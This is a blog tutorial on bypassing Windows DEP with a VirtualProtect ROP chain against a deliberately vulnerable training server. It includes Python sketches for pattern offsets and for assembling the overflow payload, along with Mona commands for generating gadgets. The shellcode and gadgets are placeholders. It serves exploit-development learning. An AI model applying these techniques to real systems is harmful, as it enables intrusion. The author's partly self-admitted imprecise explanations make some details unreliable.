Windows PE32 bypass DEP via ROP

September 27, 2020 · 11 min read


Hi, I recently wrote a post on the topic of Windows PE32 exploitation. DEP was not active at that time, which is the standard case with Windows.

In this post I would like to talk about how DEP is implemented in Windows and show one method of circumventing it.

What is DEP?

DEP stands for Data Execution Prevention. It prevents code, malicious or otherwise, from being executed in certain memory areas such as the stack. In the classic buffer overflow case, DEP stops the shellcode from executing, which is a problem for us now. What can be done? We could try ret2libc with a call to the WinExec method, or we could use ROP. But what should ROP do for us? To clarify this, let's take a closer look at DEP in Windows.

Microsoft introduced DEP with Windows XP SP2 (2004). That put an end to the classic buffer overflows. If an application now tries to execute code in a non-executable area, an access violation exception is thrown. If it is not caught, the application crashes and that's it. By default, DEP therefore prevents the application from executing code in data areas such as the stack. To run code from newly allocated memory, the application must request memory marked with one of the following flags: PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE or PAGE_EXECUTE_WRITECOPY. Only then can code be executed there. Another possibility is that the application changes the rules for itself using the SetProcessDEPPolicy method. The application can also use VirtualProtect to mark existing memory areas as executable, or VirtualAlloc to request new memory that is executable. In this post I would like to show how this works with VirtualProtect.

In order to use VirtualProtect to bypass DEP, we must first understand how this method works, now that we know what it does. The signature of VirtualProtect looks like this:

BOOL VirtualProtect(
    LPVOID lpAddress,
    SIZE_T dwSize,
    DWORD flNewProtect,
    PDWORD lpflOldProtect
);

Ref: https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect

The method takes 4 parameters: lpAddress, dwSize, flNewProtect and lpflOldProtect. The parameter lpAddress is the address from which the change is to be made. The parameter dwSize describes the size of the region, counted from the address in lpAddress. With these two parameters one can select the exact start and width of the address range to be changed, as in the following picture.
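To make the interplay of lpAddress and dwSize a bit more tangible, here is a small sketch in Python. It relies on the documented behaviour that VirtualProtect always changes whole pages, namely every page that contains at least one byte of the range. The page size of 4 KiB and the sample address are assumptions of mine, and the helper name affected_pages is made up for this illustration.

```python
PAGE_SIZE = 0x1000  # assumption: 4 KiB pages, the usual size on x86 Windows


def affected_pages(lp_address, dw_size, page_size=PAGE_SIZE):
    """Return (start, end_exclusive) of the page range touched by the request."""
    if dw_size <= 0:
        raise ValueError("dw_size must be positive")
    # Round the start address down to its page boundary.
    start = lp_address & ~(page_size - 1)
    # Round the last byte of the range up to the end of its page.
    last_byte = lp_address + dw_size - 1
    end = (last_byte & ~(page_size - 1)) + page_size
    return start, end


# Hypothetical stack address close to a page boundary.
start, end = affected_pages(0x0012FF00, 0x201)
print(hex(start), hex(end), (end - start) // PAGE_SIZE, "page(s)")
```

Even a small dwSize can therefore change two pages if the range crosses a page boundary.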

The parameter flNewProtect specifies via defined constants which protection mode the area now gets. The most important constants are listed here in a small table.

Constant	Description
PAGE_EXECUTE (0x10)	The complete area is executable, but not writable.
PAGE_EXECUTE_READ (0x20)	The complete area is executable and readable, but not writable.
PAGE_EXECUTE_READWRITE (0x40)	The complete area is executable, readable and writable.

These three constants are compatible with the VirtualProtect method. The best option for us is PAGE_EXECUTE_READWRITE, because it gives us RWX permissions, as known from Unix, so we can do what we want. In this case we want to make our shellcode executable and execute it afterwards.

The last parameter, lpflOldProtect, is a pointer to a variable that receives the protection mode that was applied before. It must point to a valid, writable address, otherwise the call fails.

And how do we build the call? We can either build it manually or have it generated automatically with Mona.py in the Immunity Debugger.
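As a quick reference, the executable protection constants can be written down as a small lookup in Python. The numeric values are the ones from the Windows headers. The helper describe and the rwx-style strings are only my own shorthand for this post, not something Windows provides.

```python
# Values as defined in the Windows headers (memory protection constants).
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80

# Unix-like shorthand, purely for illustration.
ACCESS = {
    PAGE_EXECUTE: "--x",
    PAGE_EXECUTE_READ: "r-x",
    PAGE_EXECUTE_READWRITE: "rwx",
    PAGE_EXECUTE_WRITECOPY: "rwx (copy-on-write)",
}


def describe(protect):
    """Translate a protection value into the shorthand, ignoring modifier bits."""
    return ACCESS.get(protect & 0xFF, "not an executable protection")


for value in (PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, 0x04):
    print(hex(value), describe(value))
```

The value 0x40 is the one that shows up later as NewProtect in the register setup.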

Vulnerable application

Our application will be the vulnerable-server, which can be downloaded from GitHub and is designed for exploit development. First we import all the libraries we need and create a remote connection, which simply sends the pattern created with Metasploit as the argument for the TRUN command. Our pattern is 5000 bytes long, which should be enough, since the offset to the EIP should lie somewhere within it. Up to this point, everything is the same as in the first part. The shell should look like in the picture.
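Since the exploit itself is only shown as a picture, here is a minimal sketch of this first step in Python. It is not the exact script from the picture. The pattern generator mimics the well-known Aa0Aa1Aa2... layout of the Metasploit pattern, the prefix "TRUN /.:/" is an assumption about what the server expects, and the host and port in the commented-out call are placeholders for a lab machine.

```python
import socket
from string import ascii_lowercase, ascii_uppercase, digits


def pattern_create(length):
    """Build a cyclic pattern in the Aa0Aa1Aa2... style."""
    triples = []
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length].encode("ascii")
    raise ValueError("requested length exceeds the unique pattern space")


def build_trun_request(pattern, prefix=b"TRUN /.:/"):
    """Prefix is an assumption; adjust it to what the target expects."""
    return prefix + pattern


def send_request(host, port, request, timeout=5.0):
    """Open a TCP connection and send the request once."""
    with socket.create_connection((host, port), timeout=timeout) as conn:
        conn.sendall(request)


request = build_trun_request(pattern_create(5000))
print(len(request), request[:21])
# send_request("192.168.56.101", 9999, request)  # hypothetical lab target
```

The network call is commented out on purpose, so the sketch can be run without a target.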

Create the exploit base

At this point we run the application and start the exploit to see where exactly the EIP is overwritten. Again, it is the same as in the first part. In the Immunity Debugger, we see that our EIP has been overwritten with the pattern.

Now we can simply take the value from the EIP and determine the exact point where we overwrite the EIP using the Pattern Offset Calculator. The exact offset to the EIP is 2006 bytes, which we can simply fill with junk data. To check whether the EIP is completely overwritten, we append the default pattern "BBBB" to the junk data (junk + eip). When we now run our modified exploit, the EIP should be overwritten with "BBBB", which means we have full control over the EIP, as in the following image.

At this point, as in the first part, we could look for an address that executes either JMP ESP, PUSH ESP followed by RET, or CALL ESP to get to our shellcode. This wouldn't do any good here, because we would jump into a memory area that is non-executable, so our shellcode would not be executed and we would end up with an "Access violation". What we can already do is generate the shellcode, because we still need it: it will be executed after our ROP chain has set the memory area to executable.

In the upper image you can see the shellcode that was embedded in the exploit. This is a simple Meterpreter shell, which will be executed later. In line 41 you can see how the whole exploit is structured. First we have the junk like in the first part, followed by the EIP. After the EIP, we have a small NOP sled with a length of 32 bytes, so that when we jump to the stack, we don't end up in the middle of the shellcode. After the NOP sled comes the shellcode. Schematically, the structure looks approximately like in the following picture.
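What the Pattern Offset Calculator does can be sketched in a few lines of Python: the value in the EIP is turned back into its four bytes (little-endian) and searched for in the pattern. This is my own simplified version, not the Metasploit tool, and the EIP value in the example is derived from the pattern itself instead of being read from the debugger.

```python
import struct
from string import ascii_lowercase, ascii_uppercase, digits


def pattern_create(length):
    """Build a cyclic pattern in the Aa0Aa1Aa2... style."""
    triples = []
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length].encode("ascii")
    raise ValueError("requested length exceeds the unique pattern space")


def pattern_offset(eip_value, length=5000):
    """Return the offset of the EIP bytes in the pattern, or -1 if absent."""
    needle = struct.pack("<I", eip_value)  # x86 stores the value little-endian
    return pattern_create(length).find(needle)


# Simulate a crash: take the 4 bytes that would land in the EIP at offset 2006.
pattern = pattern_create(5000)
simulated_eip = struct.unpack("<I", pattern[2006:2010])[0]
print(hex(simulated_eip), pattern_offset(simulated_eip))

# Control check from the text: junk up to the offset, then "BBBB".
check_payload = b"A" * 2006 + b"BBBB"
```

If the offset is right, the debugger shows 42424242 in the EIP after sending check_payload.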
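The structure described above can be sketched in Python roughly like this. The shellcode here is only a placeholder of INT3 bytes, not the Meterpreter shellcode from the picture, and the function name build_payload is my own choice.

```python
import struct

OFFSET = 2006    # offset to the EIP, as determined with the pattern
NOP_LEN = 32     # length of the NOP sled


def build_payload(eip, shellcode, offset=OFFSET, nop_len=NOP_LEN):
    """Assemble junk + EIP + NOP sled + shellcode."""
    junk = b"A" * offset
    nopsled = b"\x90" * nop_len
    return junk + struct.pack("<I", eip) + nopsled + shellcode


# Placeholder shellcode (INT3 instructions), NOT a real payload.
shellcode = b"\xcc" * 16
payload = build_payload(0x42424242, shellcode)
print(len(payload))
```

With DEP active, the jump into the NOP sled still ends in an access violation, which is exactly why the ROP chain is needed.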

Develop the ROP-Chain

Now we can turn to the ROP chain, which disables DEP for the part of the stack where our shellcode is located, or in other words makes that area executable. You can use Ropper, for example, to collect all the gadgets, or you can use Mona.py to generate the ROP chain. In this post, I'll have it generated via Mona.py. This command generates the ROP chain for us:

!mona rop -m *.dll -cp nonull

What does this command do in detail? First we want to create a ROP chain via !mona, that's what the rop argument is for. The parameter -m specifies which modules of the application should be searched for gadgets, e.g. KERNEL32.dll. In this case all DLLs are searched. The parameter -cp specifies which requirements the pointer addresses (gadget addresses) should fulfill. In this case the addresses must not contain null bytes. You can read the whole thing again here.
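What "no null bytes" means for an address can be checked quickly in Python. A null byte in the payload is typically a problem because it can cut off the input when it is handled as a string. The addresses below are invented placeholders and do not come from a real module.

```python
import struct


def has_null_byte(address):
    """True if the 32-bit little-endian form of the address contains 0x00."""
    return b"\x00" in struct.pack("<I", address)


# Hypothetical gadget addresses, for illustration only.
candidates = [0x00401234, 0x62501234, 0x77C10000]
usable = [hex(addr) for addr in candidates if not has_null_byte(addr)]
print(usable)
```

This is roughly the filter that -cp nonull applies to the pointers Mona finds.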

Once you have done this, you can now wait a little while for Mona to finish. It may take a few minutes under certain circumstances. So here you can put on a coffee and switch off briefly.

When Mona is finished, you can display the rop_chain.txt and copy the complete contents to the Kali Linux VM via SSH and the nano editor. The rop_chain.txt can be found in the working directory that you have set before. If you have not set one, Mona should write all its output to the program folder of the Immunity Debugger. You can change this with:

!mona config -set workingfolder c:\monaoutput\%p

Here %p stands for the name of the process that runs in the debugger. Before you embed the whole thing in the exploit, you should take a closer look at the rop_chain.txt and check whether it includes addresses that are marked with either REBASED or ASLR. If it does, the exploit may have to be adapted again after a reboot of the system, because the addresses have changed. Let's first take a closer look at the register setup.
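Checking the file by eye works, but a few lines of Python can do the same. The sketch simply searches each line for the two markers. The sample text is invented by me to have something to run against, so the exact line format of the real Mona output may differ.

```python
def flagged_lines(text, markers=("REBASED", "ASLR")):
    """Return (line number, markers found, line) for every flagged line."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        found = [marker for marker in markers if marker in line]
        if found:
            hits.append((number, found, line.strip()))
    return hits


# Invented sample, only loosely modelled on a generated chain.
sample = """\
0x11111111,  # POP EAX # RETN [example1.dll]
0x22222222,  # POP ECX # RETN [example2.dll] ** REBASED ** ASLR
0x33333333,  # PUSHAD # RETN [example3.dll] ** ASLR
"""

for number, found, line in flagged_lines(sample):
    print(number, found, line)
```

To use it on the real output, read the file contents into a string and pass it to flagged_lines.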

Register setup for VirtualProtect() :
EAX = NOP (0x90909090)
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = ptr to &VirtualProtect()
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD

Here you can see how the registers must be set so that the method VirtualProtect can be called and our shellcode becomes executable. I have to mention that besides the 4 parameters there is effectively a 5th value: the return address, which is used to jump to the shellcode once VirtualProtect returns. Mona gives us 2 possibilities. I will try to generalize the whole thing so that you can roughly understand what is happening here.

The register ESP provides lpAddress automatically: PUSHAD saves the current stack pointer, so the region to be changed starts on the stack itself. The register EBX contains the length (dwSize), i.e. how many bytes the region should cover. The register EDX holds the new protection mode, in this case flNewProtect = PAGE_EXECUTE_READWRITE, so that we can read, write and execute. The register ECX holds lpflOldProtect, a pointer to a writable address where the previous protection mode is stored. EAX and ESI deal with the address of the method VirtualProtect, either as a direct pointer or as a reference to it, depending on whether the method can be called via a direct pointer. If it can, ESI holds that pointer and EAX is simply filled with NOPs and not used for the time being. Otherwise EAX holds a pointer to the address of VirtualProtect and ESI points to a JMP [EAX] gadget. The register EBP normally contains the return address, which points to a JMP ESP. Alternatively, if that doesn't work, it contains a POP that skips the next 4 bytes, so that we can jump to the manually searched address of a JMP ESP instruction at the end. The EDI register simply contains the address of a RETN (a ROP NOP), so that execution returns to the stack and continues with the next entry. Once all registers are set, a PUSHAD gadget writes them onto the stack in one go, which lays out the function pointer, the return address and the parameters in the order the call needs. It's a bit tricky to understand what exactly happens there, and I admit I don't understand it 100% either, but roughly you can follow it: first the registers are set as they should be and then the call takes place, similar to Linux.
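To see why exactly these registers are used, it helps to simulate what PUSHAD does. The instruction pushes EAX, ECX, EDX, EBX, the original ESP, EBP, ESI and EDI in this order, so EDI ends up on top of the stack. The following Python sketch only models this ordering for the first register setup. It does not execute anything, and the role descriptions are shortened versions of the Mona output.

```python
# Order in which PUSHAD pushes the registers (first pushed = deepest on the stack).
PUSHAD_ORDER = ["EAX", "ECX", "EDX", "EBX", "ESP", "EBP", "ESI", "EDI"]


def stack_after_pushad(registers):
    """Return the stack contents from the top (lowest address) downwards."""
    return [(name, registers[name]) for name in reversed(PUSHAD_ORDER)]


# First register setup from the Mona output.
registers = {
    "EAX": "NOP (0x90909090)",
    "ECX": "lpflOldProtect (ptr to writable address)",
    "EDX": "flNewProtect (0x40)",
    "EBX": "dwSize",
    "ESP": "lpAddress (automatic)",
    "EBP": "return address (ptr to jmp esp)",
    "ESI": "ptr to VirtualProtect()",
    "EDI": "ROP NOP (RETN)",
}

for name, role in stack_after_pushad(registers):
    print(f"{name}: {role}")
```

Read from the top, the RETN after PUSHAD takes the ROP NOP from EDI, which in turn returns into VirtualProtect from ESI. At that moment the stack holds the return address (EBP) followed by the four parameters from ESP, EBX, EDX and ECX, and the NOPs from EAX come right after them.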

Embed the ROP-Chain and test it

If we look at the generated output, we will find that it contains quite a lot of ROP chains. There are ones for VirtualProtect, VirtualAlloc, and so on. Each chain is translated into Ruby, C, Python and JavaScript, which is quite handy. All we have to do now is find our ROP chain for VirtualProtect in Python and then put it into our exploit.

In the picture we can see the embedded ROP chain in our exploit. We also see that almost all gadgets have been flagged with an ASLR warning. We now need to wire the ROP chain into the payload, then the exploit is ready. The variable eip can be removed here or replaced by the variable rop_chain. This means that the return address is no longer overwritten with a jump address, but with the first gadget of the ROP chain, so that the chain is executed directly.
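In Python, swapping eip for the ROP chain could look roughly like the following sketch. The gadget values are dummy placeholders and not the addresses Mona generated, and the shellcode is again only a row of INT3 bytes. The names pack_chain and build_payload are my own.

```python
import struct

OFFSET = 2006    # offset to the EIP, as determined with the pattern
NOP_LEN = 32     # length of the NOP sled


def pack_chain(gadgets):
    """Pack each 32-bit gadget address or value as little-endian."""
    return b"".join(struct.pack("<I", gadget) for gadget in gadgets)


def build_payload(gadgets, shellcode, offset=OFFSET, nop_len=NOP_LEN):
    """Assemble junk + ROP chain + NOP sled + shellcode."""
    return b"A" * offset + pack_chain(gadgets) + b"\x90" * nop_len + shellcode


# Dummy values standing in for the generated chain.
rop_gadgets = [0x41414141, 0x42424242, 0x43434343]
shellcode = b"\xcc" * 16  # placeholder, NOT a real payload

payload = build_payload(rop_gadgets, shellcode)
print(len(payload))
```

The first packed gadget sits exactly where "BBBB" was placed before, so it is the first address that ends up in the EIP.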

In the picture you can see how exactly the exploit is structured. The changes in the exploit code should now look like the scheme.

Once the whole thing is customized, we can test our exploit. If everything works, we should get a Meterpreter shell. I have made a small recording, so that you can see the exploit in action 😄

As you can see, the exploit works quite well.

Final thoughts...

Binary exploitation on Windows is not as hard as you might think. It mostly seems that way because most of the information and tutorials you can find are about Linux, although there are also some tutorials and writeups about Windows. As you have seen, Windows has its own security features, which have to be bypassed before you can get a shell and execute your code. It's a bit tricky, even for me, as I was previously focused only on Linux. I think for many it's a little difficult at first to move from binary exploitation on Linux to Windows, or to add Windows to their skills. But we also saw that there are tools on Windows that help to implement some binary exploitation techniques. One of them was Mona.py. I should mention one thing I noticed: the generated ROP chains do not always work. So sometimes you have to build them yourself, but hey, that way you get to deal with the core of Windows.

I hope you enjoyed it and bye... 😄
